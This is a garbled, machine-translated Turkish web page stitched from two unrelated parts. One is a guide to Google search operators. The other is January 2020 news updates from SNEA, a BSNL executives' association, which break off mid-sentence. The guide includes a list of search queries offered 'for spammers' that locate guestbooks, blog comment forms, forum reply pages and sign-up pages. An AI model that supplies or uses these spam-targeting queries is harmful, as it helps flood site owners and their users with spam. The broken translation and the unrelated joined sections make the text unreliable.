    Örneğin: bağlantı: www.site http: //www.site bağlantısı olan tüm sayfaları gösterecek

    ilişkili: Belirtilen web sayfasıyla "ilgili" web sayfalarını görüntüler.
    Örneğin, related: www.google.com Google'ın ana sayfasına benzer web sayfalarını listeleyecektir.

    bilgi: Bilgi İsteme: İstenen web sayfasıyla ilgili olarak Google'ın sahip olduğu bazı bilgileri sağlar.
    Örneğin, bilgi: web sitesi forumumuzla ilgili bilgileri gösterecek \u003d) (Armada - Yetişkin web yöneticileri Forumu).

    Diğer bilgi talepleri

    tanımlamak: Define: sorgusu bundan sonra girdiğiniz kelimelerin çeşitli çevrimiçi kaynaklardan derlenmiş bir tanımını sağlayacaktır. Tanım, girilen tüm kelime öbeği için olacaktır (yani, tüm kelimeleri tam sorguda içerecektir).

    hisse senetleri: İsteğinizi hisse senetleriyle başlatırsanız: Google, talep şartlarının geri kalanını hisse senedi simgeleri olarak değerlendirecek ve bu semboller için hazır bilgileri gösteren bir sayfaya bağlantı verecektir.
    Örneğin, hisse senetleri: Intel yahoo Intel ve Yahoo hakkında bilgi gösterecek. (Şirket adını değil, en son haber sembollerini yazmanız gerektiğini unutmayın)

    Değiştiriciler İste

    site: Sorgunuza site: eklerseniz, Google sonuçları verilen etki alanında bulduğu web siteleriyle sınırlar.
    Ayrıca ru, org, com, vb. Gibi tek tek bölgeleri de arayabilirsiniz ( site: com site: ru)

    allintitle: Allintitle: ile bir istek çalıştırırsanız, Google sonuçları başlıktaki isteğin tüm sözcükleriyle sınırlayacaktır.
    Örneğin, allintitle: google arama resimler, Blog vb. gibi tüm google arama sayfalarını döndürür

    intitle: İsteğinize intitle: eklerseniz, Google sonuçları başlığında bu kelimeyi içeren belgelerle sınırlayacaktır.
    Örneğin, intitle: İş

    allinurl: Allinurl ile bir sorgu çalıştırırsanız: Google, URL'deki tüm sorgu sözcükleriyle sonuçları sınırlar.
    Örneğin, allinurl: google arama google içeren dokümanları döndürür ve başlıkta arama yapar. Ayrıca, bir seçenek olarak, eğik çizgiyle (/) sözcükleri ayırabilirsiniz, ardından eğik çizginin her iki yanındaki sözcükler aynı sayfada aranacaktır: Örnek allinurl: foo / bar

    inurl: Sorgunuza inurl: eklerseniz, Google sonuçları URL’de bu kelimeyi içeren belgelerle sınırlar.
    Örneğin, Animasyon inurl: web sitesi

    intext: yalnızca belirtilen kelime için sayfanın metninde arar, başlık ve bağlantı metinlerini ve ilgili olmayan diğer şeyleri yok sayar. Bu değiştiricinin bir türevi de vardır - allintext: şunlar. ayrıca, sorgudaki tüm kelimeler yalnızca metinde aranacaktır, bu da önemlidir, bağlantılarda sık kullanılan sözcükler yok sayılır.
    Örneğin, intext: forum

    tarih aralığı: zaman dilimlerinde arama yapar (tarih aralığı: 2452389-2452389), zamanlar için tarihler Jülyen biçiminde belirtilir.

    Ve her türden ilginç sorgu örnekleri

    Google için sorgu yazma örnekleri. Spam gönderenler için

    Inurl: control.guest? A \u003d işareti

    Site: books.dreambook.com "Ana Sayfa URL'si" "İmzala" inurl: imzala

    Site: www.freegb.net Anasayfa

    Inurl: sign.asp "Karakter Sayısı"

    "İleti:" inurl: sign.cfm "Gönderen:"

    Inurl: register.php "Kullanıcı Kaydı" "Web Sitesi"

    Inurl: edu / ziyaretçi defteri "Ziyaretçi Defterini İmzala"

    Inurl: "Yorum Gönder" "URL'si" gönder

    Inurl: / archives / "Yorumlar:" "Bilgileri hatırlıyor musunuz?"

    "Senaryo ve Ziyaretçi Defteri Oluşturan:" "URL:" "Yorumlar:"

    Inurl :? Action \u003d "phpBook" "URL" ekleyin

    Intitle: "Yeni Hikaye Gönder"

    Dergiler

    Inurl: www.livejournal.com/users/ mode \u003d yanıt

    Inurl greatjournal.com/ mode \u003d yanıt

    Inurl: fastbb.ru/re.pl?

    Inurl: fastbb.ru /re.pl? "Ziyaretçi defteri"

    Bloglar

    Inurl: blogger.com/comment.g? ”PostID” "anonim"

    Inurl: typepad.com/ "Yorum gönder" "Kişisel bilgileri hatırlıyor musun?"

    Inurl: greatjournal.com/community/ "Yorum gönder" "anonim posterlerin adresleri"

    "Yorum gönder" "isimsiz posterlerin adresleri" -

    Intitle: "Yorum gönder"

    Inurl: pirillo.com "Yorum gönder"

    Forumlar

    Inurl: gate.html? ”Name \u003d Forumlar” “mode \u003d response”

    Inurl: "forum / gönderi.php? Mod \u003d yanıt"

    Inurl: "mes.php?"

    Inurl: ”members.html”

    Inurl: forum / memberlist.php? "

    Ocak 2020 ayı boyunca güncellenen mesajlar

    16-01-2020

    Taziye Mesajı

    SNEA, Ölümü İçin Derin Üzüntüyü İfade Ediyor

    Kıdemli Lider

    Com K. Viswanathan

    JETA / JTOA CHQ Haznedarı (3 Kez)

    19/11, D blok Nandhini apartmanları kilise yolu, Chrompet Chennai 44,


    15-01-2020

    15-01-2020

    15-01-2020

    BSNL aracılığıyla Üçlü Oyun FTTH hizmeti için Hayati Bir Buluş:

    IPTV sağlanması için açık politika: İçerik sağlayıcılar / ortaklar tarafından BSNL FTTH aracılığıyla IPTV hizmetlerinin sağlanması için çok beklenen Politika BSNL CO tarafından yayınlanmıştır.

    Bu girişim, BSNL'lerin Üçlü Oyun Hizmetleri sağlayan büyük Özel Oyunculara cevabı olarak lanse ediliyor.

    Bu proje ile BSNL, Müşterilere Gerçek Üçlü Oyun Hizmeti çünkü burada TV izlemek İnternet Verilerini tüketmeyecek.

    Bu, BSNL'nin yeniden canlanması için önemli bir Yaşam Hattı olacak.

    Bu Girişim, Com Anoop K J, JTO OMCR, Ernakulam liderliğindeki şirket içi yeteneklerde BSNL'nin teknik desteği ile Kerala Circle'daki Thrissur BA'da bir LCO / TIP tarafından özel olarak başarıyla geliştirildi ve uygulandı..

    WiFi kullanarak cep telefonunu kullanarak sabit telefon görüşmeleri yapmak / almak için bir Uygulama geliştirdiler.

    Bu proje, Ağustos 2019'da Bangalore'da yakın zamanda düzenlenen SNEA CWC Buluşmasında sunuldu.

    IPTV'nin BSNL Ağı aracılığıyla uygulanması için farklı Çevrelerden çeşitli Teklifler alınmıştır..

    IPTV'nin (veya TV hizmetinin) olmaması, ülke genelindeki çok operatörlü LCO'lardan BSNL FTTH bağlantılarına verilen yetersiz yanıtın ana nedenlerinden biri olarak tanımlanmıştır..

    SNEA projeyi her seviyede takip ediyor ve tünelin sonunda ışığı görmekten mutluluk duyuyoruz.

    Gerçek potansiyellerini sergileyen BSNL'deki kurum içi yetenekleri tebrik ediyoruz..

    SNEA, projenin BSNL CO'da ve tüm Circle Ofislerinde ve özellikle Com. P Padmanabha Rao, AGS & DGM'miz, BSNL CO.

    IPTV Açık Politikası

    15-01-2020

    Organizasyonel Yeniden Yapılanma: Bölgesel Olmayan Çevrelerin Birleşmesi.

    Bakım ve Proje Çevreleri birleştirildi ve Çekirdek Ağ İletimi (Doğu / Batı / Kuzey / Güney) olarak yeniden adlandırıldı. Kuzey Doğu için Ayrı Daire, yani AS, NE I ve NE II Çevrelerini kapsayan Çekirdek Şebeke-İletim NE Bölgesi. 04/01/2020 tarihinden itibaren geçerlidir.

    Telekom Fabrikaları, 02/01/2020 tarihinde BA başkanı olarak ilgili Bölgesel Dairelerle birleştirildi.

    NCNGN Circle, BBNW Circle ile birleşti.

    Nodal Center Chandigarh, Punjab Circle ile birleşti.

    Gaziabad ALTTC'de sadece bir Eğitim Çemberi. ALTTC, NATFM ve BRBRAITT, BA Başkanı olarak görev yapacak. Gelecekte yalnızca bölgesel RTTC'ler.

    Ön yazı eki

    15-01-2020


    14-01-2020

    GS, Shri P K Purwar, CMD / BSNL'ye yazıyor:

    Lütfen için hemen harekete geçin Bakım düzenlemesi yerine düzenli terfi Halihazırda daha yüksek ölçeklerde çalışan Yöneticilerden farklı Sınıflarda sadece isim değişikliği ile VRS 2019'un saha birimlerinde yarattığı büyük boşluğu doldurmak ve Yöneticileri ekstra iş yükü almaya motive etmek için:

    02/01/2020 tarihinde mevcut verilere göre,

    i) 1481 onaylı güce karşı sadece 57 DGM (T) mevcut olacaktır.

    ii) 402'nin onaylanmış gücüne karşı yalnızca 32 DGM (Fin) mevcut olacaktır.

    iii) Bir yıl önce çalışan 6500 AGM yerine BSNL'de yalnızca 1746 AGM (T) mevcut olacaktır. DGM promosyonunda, AGM'lerin sayısı% 20'den az olmak üzere yaklaşık 1200 olacaktır. 15 yıllık hizmete sahip SDE'ler terfi bekliyor.

    iv) 1347 olan yaptırım gücüne karşı yalnızca 70 CAO bulunacaktır. Bunlar, boş DGM (Fin) mevkilerini görevlendirmek için bile yeterli olmayacaktır.

    v) JTO, SDE eşdeğeri sınıflarda 5 ile 30 yıl arasında çalışmakta ve terfi beklemektedir. 1988'den itibaren işe alınan JTO'lar Arch kanadında terfi bekliyorlar. 1999, 2001'den 2008, 2010, 2013'e kadar binlerce JTO vb. Parti ilk promosyonlarını bekliyor. JTO (Civil / Elect / TF) kanat durumu da aynı derecede kötü.

    Düzenli terfi yerine yönetimin yaygın bakım düzenlemesine tamamen itiraz ediyoruz. Yöneticiler halihazırda daha yüksek ölçeklerde çalışmaktadırlar ve LA düzenlemesi yerine sadece atama değişikliği ile düzenli olarak daha yüksek derecelere terfi edilebilirler.

    CMD'ye GS harfi

    11-01-2020

    Shri Arvind Vadnerkar, DIR (HR) ile 09/01/2020 tarihinde görüşme: GS, Başkan ve her iki AGS, Sr GM (Pers & Estt), GM (SR), GM (Restg), GM (Admn) ve GM'lerin (Pers) huzurunda DIR (HR) ile bir araya geldi ve aşağıdaki konularda tartışmalar yaptı:

    BSNL'nin kadrolama normları ve yeniden yapılandırılması: Restg hücresi tarafından yayınlanan geçici personel normunun, saha gerçekleri yönetim tarafından dikkate alınmadığı için hiç uygulanabilir olmadığını açıkladık. Geçici normlara göre, bugün GM'ler tarafından yönetilen bazı SSA'ların ileride bir SDE tarafından yönetilmesi gerekiyor. Yalnızca bir veya iki Yöneticinin haklı gösterileceği çok büyük coğrafi alanlara sahip çok sayıda küçük SSA olacaktır. Bu alanlarda hizmetlerin sürdürülmesi pratik olarak imkansız olacaktır. Dış kaynak kullanımı ile Yöneticilerin rolü ve sorumluluğu özellikle CFA segmentinde azalmayacaktır. Kırsal alanlarda, Transmission, BTS mtce, EB, Cable Maintenance'ın tüm işlerinin SDE (Group) ile geniş alanlarla bir araya getirilmesi, amacına aykırı olacaktır. Benzer şekilde kentsel alan normları da katıdır. Dolayısıyla geçici normlar derhal yeniden işlenecek. Aksi taktirde dış fabrika ve Trans mtce'de kimse işe gelmeyecek ve çalışanlar da Kapalı Alan, Mobil vb. Benzer şekilde, yedek oyuncular 01/31/2020 tarihinde sorunsuz bir devralma için birçok SSA'da işaretlenmemiştir. Müdür ve GM (Restg), gözden geçirilebilecek olanın yalnızca geçici normlar olduğunu açıkladı. Derhal inceleme talebinde bulunduk.

    Dış kaynak kullanımı ihalesinde Primer Kablo bakımının da yer alması gerektiği konusunda saha birimlerinden gelen talebi ayrıca açıkladık. Mevcut TT'ler arasında çok azı kablo birleştirme bilgisine sahiptir ve bunlar tüm Birincil Kabloları korumak için yeterli değildir. Diğerleri Kapalı Alan / MDF / Enerji Santrali bakımı için gereklidir. Bu gerçekler DIR (CFA) ile yapılan toplantıda açıklandı ancak şu ana kadar olumlu bir karar çıkmadı. DIR (HR), bu önemli konuyu DIR'ın (CFA) bildirimine tekrar getirmeyi garanti etti.

    VRS sonrası senaryodaki promosyonlar ve Lookafter düzenlemesi yerine Düzenli Promosyon ihtiyacı: Düzenli terfi yerine Bekleme düzenlemesi verildiği için harekete şiddetle karşı çıktık. Neredeyse DGM (T / Fin) pozisyonları ve AGM / CAO / EE notları 01/31/2020 tarihinde VRS'den sonra boş kalacak ve terfi için derhal harekete geçilmesini talep ettik. Yeterli deneyime sahip çok sayıda Yönetici daha yüksek ölçeklerde çalıştığından, onlara atama değişikliği ile terfi verilebileceğini belirttik. Benzer şekilde, farklı kanatlardaki binlerce JTO zaten daha yüksek ölçeklerdedir ve yeniden adlandırılarak terfi edilebilir. DPC bile gerekli değildir. LA düzenlemesi, hizmetlerini ve gelecekteki tanıtım yollarını kaybettikleri için Yöneticilerin çıkarlarına aykırıdır. Yönetim LA yıllarını birlikte geçiriyor ve düzenli promosyonları reddediyor. Bu mekanizmanın durdurulmasını ve tüm uygun Yöneticiler için düzenli terfiler yapılmasını talep ettik.

    DGM promosyonlarında,SNEA, 01.01.2020 tarihinde Bakan Yardımcısı DoT ile görüşmesini ve DGM tanıtımlarına izin veren olumlu kararını açıkladı. DoT bile 12/30/2019 tarihinde emekli olanlar için 12/30/2019 tarihinde Sr DDG (CGM) seviyesine terfi vermiş ancak BSNL, emekli olmadan önce boş kadrolara terfi vermek için herhangi bir işlem yapmamaktadır. Tartışmadan sonra, DIR (HR) Sekreter / DoT ve CMD / BSNL ile görüşme ve DGM promosyonları için gerekenleri yapma konusunda güvence verdi.

    2001 Rect JTO'larının tersine çevrilmesi LDCE -2007'yi geçti: Yine konu üzerine tartışma yapıldı ve Assn, SDE RR maddesi 12, not 5 ve LDCE-2007'de yer almaya uygunluklarına ilişkin 2007'de yayınlanan açıklamalara istinaden uygunluklarını açıkladı. Şimdi, bazıları LDCE 2010 için 2012'de yayınlanan açıklamalara dayanarak geri alındı. LDCE 2007 ve LDCE 2010'da görünmeye uygunluk ile ilgili olarak yayınlanan açıklamalar tamamen farklıdır ve bu, sorunu karmaşık hale getirmiştir. Uygunluğun, talep ettiğimiz LDCE 2007 için yayınlanan açıklamalara göre kararlaştırılması gerekiyor. Halihazırda SDE haline geldikleri için, 2012 ve 2015'te düzenlenen sonraki DCE'yi yazamadılar. Bunların arasında, bazı TN Circle SDE'leri geri dönüşle karşı karşıya kalırken, diğerlerine yalnızca neden bildirimi sunuluyor. Yönetimin önüne konulan gerçeklerle konu karara bağlanana kadar eski haline dönme sürecini durdurmayı talep ettik. Konuyu incelemek için bir Komite kurulmasını önerdik. Son olarak DIR (İK), uygun kararın alınması için ilgili memurlara ertesi gün ilgili tüm dosyaları getirmelerini emretti.

    10-01-2020

    10-01-2020

    10-01-2020

    01/10/2020 tarihinde CMD BSNL'den Shri P. K. Purwar ile görüşme: AIBSNLEA ve SNEA'nın Genel Sekreterleri ve AGS'leri bugün CMD BSNL ile bir araya gelerek aşağıdaki konularda görüşmeler yaptılar:

    DGM (T) Promosyonları:DET'den DGM (T) 'ye terfilerle ilgili olarak, Sekreter (T) DoT ile 01 Ocak ve 03 Ocak 2020'de Sekreter (T)' nin DGM (T) için promosyonlar için mutabık kaldığı toplantıyı açıkladık. Ek Finansal Çıkarımlar yaratmamak. CMD BSNL, bu konuda Sekreter (T) ile de görüştüğünü ve gerekli olanı yapmaya çalıştığını bildirdi.

    Çalışanların Maaşından bekleyen tahsilat aidatlarının takas edilmesi: CMD, VRS optees ile ilgili olarak GPF geri kazanımlarının ödemesinin Rs hakkında 710 Crore Pazartesi günü piyasaya çıkacağını bildirdi. Diğer aidatlar da en erken ödenecek.

    VRS'den sonra boş pozisyonları doldurmak için promosyonlar: Terfilerle ilgili olarak CMD, çalışanların promosyonları en az bir yıl unutmaları ve BSNL'nin Yeniden Canlandırılması için çok çalışmaları gerektiği görüşündedir. Ayrıca, gelecekte promosyonlara daha fazla değerin dahil edileceği görüşünde. Temel gerçekleri açıkladık. Telecom & Finance Wings'deki hemen hemen tüm DGM gönderileri ile AGM & CAOs gönderileri 31.01.2020'den sonra boş olacak ve bundan sonra bu boş yazıları hemen doldurmadan BSNL'yi çalıştırmak zorlaşacak. JTO ve SDE Kadrolarında durgunluk var ve terfileri ertelenemez. JTO'ların ve JAO'ların işe alınması sırasında ve ayrıca JTO'dan SDE'ye terfilerde, rekabetçi sınav mevcuttur ve terfi sırasında uygun olan% 50 Yöneticilerin sadece rekabetçi kotadan olduğunu açıkladık. CMD BSNL, VRS 2019 sonrası AGM, CAO ve DGM gönderilerindeki eksiklik konusunda anlaştı.

    Emekli çalışanlara veda: Emeklilerin hizmetlerinin tanınması üzerine, BSNL'deki geçmiş hizmetlerinin takdirinin ve onlar için onurun bir göstergesi olduğu için 3001 Rs tutarını geri ödemeyi talep ettik. CMD, BSNL'deki nakit sıkışıklığı nedeniyle beceriksizliğini bildirdi. Bu durumda, bu miktara eşit şarj kuponları gibi bazı alternatif düzenlemeler önerdik. CMD, önerimizi takdir etti ve Nakit Ödülü yerine alternatifi araştırmayı kabul etti.

    USOF Projelerinin Adaylık Bazında BSNL'ye Tahsisi: USOF Projelerinin BSNL'ye Adaylık Bazında tahsisine ilişkin CMD BSNL'yi değerlendirdik. CMD BSNL, tüm Govt'u yapmak zorunda olduğumuzu belirtti. Projeler / USOF Projeleri ve önceki yıllardaki performansımız çok iyiydi ve Govt'u tamamladık. Zaman çerçevesi içindeki projeler. Ancak, Adaylık Bazında verilirse BSNL için iyi olacağını, aksi takdirde ihale yoluyla rekabet edersek BSNL için faydalı olmayabileceğini düşünüyoruz.

    Birincil Kabloların Bakımı: Dış kaynak kullanımı için Birincil Kablo bakım siparişleri Kurumsal Ofis tarafından verilmediği için, VRS Sonrası Senaryoda Yöneticiler ve çeşitli Dairelerin Birincil Kabloların bakımında karşılaştıkları zorluklar hakkında CMD'yi ayrıca değerlendirdik. CMD BSNL, çeşitli Eyaletlerdeki geliştirme çalışmaları nedeniyle, Ana Kablonun çeşitli Yerel Eyalet Hükümetlerinden izin alınarak sık sık değiştirilmesi / bakımı yapılması gerektiğini belirtti. İsteklinin öne çıkamayacağı ve bakım çalışmalarımızın ağır zarar göreceği Kurumlar / Karayolu Yetkilileri.

    MDF'nin bakımı:CMD BSNL'ye MDF'nin kontrolünün BSNL Personeli içinde olması gerektiğini iddia ettik. CMD BSNL, genç kadromuzun öne çıkması, önemli işleri kapması ve sorumluluk alması gerektiğini belirtti. CMD ayrıca, VRS sonrası senaryoda personel sıkıntısı nedeniyle MDF'yi BSNL Personeli tarafından 24 saat sürdürmenin mümkün olmayabileceğinden bahsetti. Ayrıntılı tartışmanın ardından CMD, durumu üç ay sonra gözden geçirmeyi garanti eder.

    08-01-2020

    08-01-2020

    SNEA, Kamu Sektörünün Özelleştirilmesi ve diğer taleplere karşı 08.01.2020 tarihinde Merkez Sendikaların Genel Grev'e dayanışma ve moral desteğini uzatıyor

    07-01-2020

    07-01-2020

    Assam Circle Circle Yürütme Kurulu toplantısı 01/04/2020 tarihinde Guwahati'de gerçekleştirildi. GS ve Jt Sec (Doğu) genişletilmiş CEC toplantısına hitap etti. CHQ liderleri, kıdemli liderlerin katkılarını anımsadı ve aktivistler VRS'yi aldı. Farklı taleplerin çözümü için çeşitli mücadelelerde Derneğe önderlik ederler ve katkıları sonsuza dek hatırlanacaktır. Tüm ücretler 31.01.2020 tarihine kadar ödenecek ve BSNL ile ayrılmaları sorunsuz olacaktır.

    Nihayetinde yıllarca süren mücadelemiz BSNL için iyi sonuçlar getirdi. Yönetim ve Govt, maaş kesintileri, suçlama belgeleri, sebep bildirimleri vb. Birçok yolla mücadelemizi bastırmaya çalıştı ama asla taviz vermedik. Sonunda mücadelemiz, talep ettiğimiz gibi 4G spektrumunu ücretsiz olarak ortaya çıkardı, araziden para kazanmayı onayladı, VRS'nin tüm harcamaları Govt tarafından karşılanıyor, 8500 Cr tahvili, mali destek sağlamak için onaylanmış devlet garantili vb.

    Ana odak noktamız BSNL'nin yeniden canlandırılmasıdır. 4G lansmanının 01.03.2020 için yapılması planlanıyor. Tarife artıyor, bu da endüstri ve BSNL için iyi bir işaret. Yönetim, çalışanları güvene alan iyi bir mekanizma uygulayabilirse, Revival çok mümkün. Her şey yönetime bağlı.

    Kurumsal düzeyde, BSNL yeniden yapılanması devam ediyor. Değişen senaryoda, CFA çalışmasının dış kaynak kullanımı için yönergeler yayınlanmıştır. Ancak zorlu koşullar nedeniyle birçok yerde başarısız olabileceğinden ve 02/01/2020 tarihinden sonra BSNL'nin hizmetlerin sürdürülmesinde büyük sıkıntı yaşayacağından korkuyoruz, yönetimi bilgilendirdik. Tecrübeli işçiler ihaleye katılamayabilir. Diğer dikeylerde de benzer çalışmalar devam ediyor.

    Korktuğumuz gibi, İK dikeyinde, gönderi sayısı yeniden yapılanma nedeniyle büyük ölçüde azalmaktadır. VRS çeşitli zorluklar ortaya koydu ve azaltma ve terfi sonrası bunlardan biri. Post indirimi tehdidi yıllarca oradaydı ve bunun beklentisiyle Dernek, post-temelli olmayan bir terfi politikası çok önceden çalıştı. Şimdi tüm odak noktamız, 07/01/2018 bitiş tarihi olan erken uygulamasıdır.

    Ne yazık ki, bazı Yönetici Asistanları hala görevlendirme tabanlı olası bir tarihten itibaren terfi (birkaç boş kadro için) ve yönetime yeni terfi politikasının uygulanmasını durdurmasına yardımcı olmak. Yönetim, küçümseme ve yeniden yapılanma adına gönderi bazlı terfi vermiyor ve aynı zamanda yeni politikayı uygulamıyor. Hepsi 01.07.18 tarihinden itibaren terfi için uygundur ancak ileriye dönük bir tarihten itibaren terfi için ısrar ediyorlar! Küçümseme dilekçesi konusundaki kararlı tavrı ve CMD ve GM'nin (Pers) CAT / Ernakulam'da kişisel olarak görünmesi talebiyle bozulan tüm SDE gönderileri için geçen yıl SDE promosyonu için fırsat elde ettik.

    Yeni terfi tüm Yöneticilere fayda sağlayacak ve AGM Sınıfına kadar sorunsuz bir kariyer ilerlemesi sağlayacaktır. 2014'e kadar olan tüm JTO'lar SDE olabilir ve 2016'ya kadar olan tüm SDE'ler şu an itibariyle Sr SDE / Sr AO veya AGM / CAO olabilir. Yeni poliçede geçmiş hizmet ağırlığı verilmiştir. Böylelikle SDE / AO'dan Sr SDE / Sr AO Grade'e terfi 3 yıl sonra, SDE / AO'dan AGM / CAO'ya yükselme ise 8 yıl içinde olacak ki bu değişen senaryoda hayal bile edilemeyecek. VRS'den sonra, tüm kadrolardaki görev sayısı büyük ölçüde azalacak.

    Sürekli mücadele ve sürekli ikna ile geçmişte birçok sorunu çözebilirdik. 2018 yılında, BSNL veya DoT tarihinde hiç duyulmamış rekor sayıda promosyon verebildik. BSNL doğrudan çalışanlarının i) tavansız EPF katkısı, ii)% 5 Emeklilik ödeneği vb. Gibi belirli sorunları çözülebilir. Geri kalan sorunların çözümüne yönelik çalışmalarımıza herkesin desteğiyle devam edeceğiz.

    06-01-2020

    Assam Circle Circle Yürütme Kurulu toplantısı 01/04/2020 tarihinde Guwahati'de gerçekleştirildi. GS ve Jt Sec (Doğu) toplantıya katıldı ve konuşma yaptı. CEC oybirliğiyle aşağıdaki Circle Office taşıyıcılarını seçti:

    Çember Başkanı: Com Suresh Bora, AGM.

    Çevre Sekreteri: Com Borun Baruah, JTO.

    Sayman: Com Allauddin Ahmed, AO.

    İşbirliği, daha önceki OB'ler VRS 2019'u tercih ettikçe gerekli hale geldi. SNEA, katkılarını yıllarca kabul ediyor ve onlara en iyisini diliyor.

    SNEA CHQ, yeni seçilen genç takım için tüm başarıları diler.

    03-01-2020

    Medya Raporlarını Görüntüle:

    Devlet kontrolündeki Bharat Sanchar Nigam Limited (BSNL), Merkez'in stresli telekomünikasyon şirketini canlandırma girişimine rağmen, 20.000 Rs crore-güçlü mega bağlantı programlarının arkasında potansiyel gelir fırsatlarının erozyonuna yol açan bürokratik belirsizliklerin ardından alıcı uçta olmaya devam ediyor. ...

    03-01-2020

    03-01-2020

    Danışman M / s Deloitte ile etkileşim:

    BSNL yönetimi 01/02/2020 tarihinde VRS sonrası senaryo ve kısa vadeli tedbirlerde BSNL hizmetlerinde süreklilik konusunda tavsiyelerde bulunmak üzere atanan Danışman M / s Deloitte ile bir toplantı düzenledi.

    GS Başkanı ve her iki AGS, danışmanla, VRS sonrası senaryoda ortaya çıkabilecek tüm konulara odaklanan yaklaşık iki saat 1600-1800 saat arasında ayrıntılı bir tartışma yaptı. Danışman, DGM, AGM ve TT (TM) kadrolarında VRS'den sonra etkili olacak akut kıtlığı tespit etti.

    Saha birimlerindeki zemin gerçeklerine, bunun VRS'den sonra nasıl etkileneceğine, etkiyi azaltmak için hemen alınacak tedbirlere, VRS sonrası senaryoda müşteri ilişkisine, SSA ve Circle'ın birleşmesine, mevcut BA yapısının dezavantajına, insan gücüne odaklanan tartışmalar personelin ihtiyacı, motivasyonu vb.

    02-01-2020

    02-01-2020

    GS, Başkan ve AGS'ler 01.01.2020 tarihinde Sekreter / DoT, Üye (T) / DoT, Addl Secretary / DoT, CMD, DIR (HR), DIR (Fin), Jt Sec / DoT ve DoT'nin diğer kıdemli memurlarıyla bir araya geldi. yeni yıl ve kısa tartışmalar yapıldı. CMD ve DIR (İK) ile yeniden yapılanma ve terfi gibi önemli konulardaki görüşmeler, yoğun programlarından dolayı önümüzdeki hafta için düzeltildi.

    Sekreter / DoT ile yaptığımız görüşmede, Parlamento Komitesi ile yapılan toplantıda Sekreter / DoT tarafından verilen cevap nedeniyle durdurulan DGM (T) promosyonu konusunu gündeme getirdik, DGM promosyonunun ancak yeniden yapılanma tamamlandıktan sonra (yani. VRS). Tüm uygun DE'lerin terfi aldığını ve DE'den DGM'ye terfi için herhangi bir çekince bulunmadığını ve 287 DE'nin tamamının SC / ST kategorisine ait olduğunu açıkladık. DE'ler arasında, 500'den fazla DE VRS için başvurdu ve 01/31/2020 tarihinden sonra yayınlanırsa promosyonu kaçıracak. Ayrıca, 12/30/2019 tarihinde, 31/12/2019 tarihinde emekli olan CGM rütbesi memurlarına bile terfi verildiğini ve promosyondan yararlanmalarına izin verildiğini bildiriyoruz. Ancak BSNL Yöneticileri söz konusu olduğunda, sadece tersi oluyor.

    Görüşmeden sonra Sekreter, DGM terfisine uygun olduğunu bildirdi: 1) VRS'den hemen önce herhangi bir mali sonuç çıkarmıyor ve 2) benzer kadrolarda herhangi bir sorun yaratmıyor. Herhangi bir mali etkisi olmadığını ve hepsinin daha yüksek ölçeklerde çalıştığını ve davalar nedeniyle 2017'den sonra DGM terfisine devam edildiğinden benzer kadrolarda herhangi bir sorun yaratmayacağını açıkladık.

    Sonra Sekreter, CMD ile görüşmemiz için bize güvence verdi ve eğer bilgi doğruysa, DGM promosyonu için izin verecektir.

    01-01-2020

    01-01-2020

    Editör

    2019: BSNL tarihinde çalkantılı dönem. Eşi görülmemiş Birlik ve Dayanışma ile bunu başarıyla aştık

    Yeni Yıl, yeni zorluklarla yeni umutları ortaya çıkarır

    2019'da çalkantılı dönemlerden geçtik, BSNL tarihinde BSNL'nin yeniden canlanmasını talep eden birbiri ardına çalkantılara tanık olmadık. BSNL çalışanları için gerçekten bir ölüm kalım savaşı idi. Her doğru düşünen BSNL İcra Kurulu, geleceğinin tamamen BSNL'nin geleceğine bağlı olduğunun bilincinde olduğundan, SNEA'nın her kararlı üyesi bir yılını BSNL'nin Yeniden Canlanmasına adadı. Maalesef bu kritik dönemde çalışanların bir kısmı da, özellikle bazı Yöneticiler, sanki BSNL'nin çöküşünün onlarla hiçbir ilgisi yokmuş gibi ana akım mücadelelerden uzak durdu. Hataların farkına varmak ve ana akıma katılmak zorundalar, aksi takdirde Yöneticiler ana akımı güçlendirme çağrısı yapacak ve bu olumsuz güçleri bırakacak.

    Evet, yönetim ve Hükümet tarafından Dernekler ve Birliklere karşı baskıcı önlemlerin, onları ajitasyon ve mücadeleleri durdurmaya zorlayarak BSNL'nin yenilgiyi kabul ederek doğal ölümüne izin verdiğine tanık olduk. Ama farklı şeylerden oluştuğumuz, her türlü fedakarlığa hazır olduğumuz ve hedefimize ulaşana kadar sonuna kadar savaşmaya hazır olduğumuz için asla merhamet etmedik. Evet, hepimiz için ne pahasına olursa olsun kazanmamız gereken bir öl ya da kal savaşıydı.

    Başlangıçta, Hükümet BSNL'nin Yeniden Canlandırılması konusunda hiç ciddi değildi. Bütün Bakanlıklar Uyanma Planına karşı çıkıyordu. Govt, BSNL'nin doğal ölümünü bekliyordu. Maliye Bakanlığı çok düşmanca davrandı, her türlü Canlanma paketine karşı çıktı ve BSNL ve MTNL'nin kapatılması için ısrar etti. Mücadele, BSNL çalışanlarının BSNL Revival lehine kamu ve medya görüşü oluşturma konusundaki başarılı çabalarıyla yan yana gerçekten harikalar yarattı. SNEA, tüm bu tür faaliyetlerin ön saflarında yer aldı. Politik müdahale için yarattığımız zorlama sonunda işe yaradı. Sayın MoC'nin samimi çabaları ve Yönetim Kurulu Başkanı olarak İçişleri Bakanı ile birlikte hem Sekreterlerin / DoT'nin hem de CMD'lerin / BSNL'nin samimi çabaları ile birlikte GoM'yi oluşturma çabaları bir şeyler gerçekleştirdi. Sayın Başbakanımızın müdahalesi için çabalarımız ve Sayın Başbakanımızın BSNL'nin canlanmasına gerçekten yardımcı olacak iyi bir Canlanma paketi vermesi için son çağrısı en belirleyici faktördü.

    Son olarak, BSNL ve MTNL canlandırma paketi, 10/23/2019 tarihinde Union Cabinet tarafından onaylandı ve BSNL ve MTNL'ye yeni bir yaşam süresi verdi. Paket, BSNL'nin yeniden canlanması için gerçek potansiyele sahip. Rs 14.155 Crores artı% 18 GST'nin 4G spektrum ücretleri, tarafımızdan talep edildiği gibi Govt tarafından karşılanacaktır. Başından beri, AUAB, Govt'un ücretsiz 4G spektrumlarını BSNL'ye tahsis etmesini talep etti. Yükümlülüklerin temizlenmesi ve CAPEX'in karşılanması için arazi paraya çevrilmesi de Kabine onayını aldı. Mali yardım talebimiz ayrıca, Devlet devlet garantili BSNL ve MTNL için 15.000 Cr için 10 yıllık uzun vadeli tahvil şeklinde gerçekleşti. MTNL'nin BSNL ile birleşmesi konusundaki endişemiz, yani devasa mali sorumluluk, borsada işlem gören bir şirket olarak durumu ve karmaşık İK sorunları, birleşme gerçekleşmeden önce ele alınmaktadır. VRS için yaklaşık 15.000 Crores'in tüm yükümlülüğü, VRS adına BSNL üzerindeki herhangi bir ek mali yüke karşı çıktığımız için Hükümet tarafından 